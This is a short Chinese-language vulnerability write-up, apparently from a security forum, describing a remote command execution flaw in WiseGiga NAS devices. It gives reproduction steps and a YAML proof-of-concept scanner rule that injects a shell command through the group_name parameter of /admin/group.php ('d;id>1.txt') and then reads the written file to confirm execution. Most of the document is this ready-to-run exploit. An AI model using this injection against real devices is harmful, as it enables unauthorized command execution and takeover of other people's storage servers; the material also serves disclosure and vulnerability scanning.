0x01 漏洞名称
WiseGiga NAS 远程命令执行0x02 漏洞描述
WiseGiga NAS是一种专用的数据存储服务器。该系统存在任意命令执行漏洞,攻击者可以通过执行任意命令,获取服务器管理权限0x03 漏洞复现
(1)访问/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt
(2)访问/admin/1.txt,文件写入成功
0x04 漏洞POC
params: []
name: WiseGiga NAS 远程命令执行
set: {}
rules:
- method: GET
path: /admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"menu02")
- method: GET
path: /admin/1.txt
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"uid=")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
请登录后查看回复内容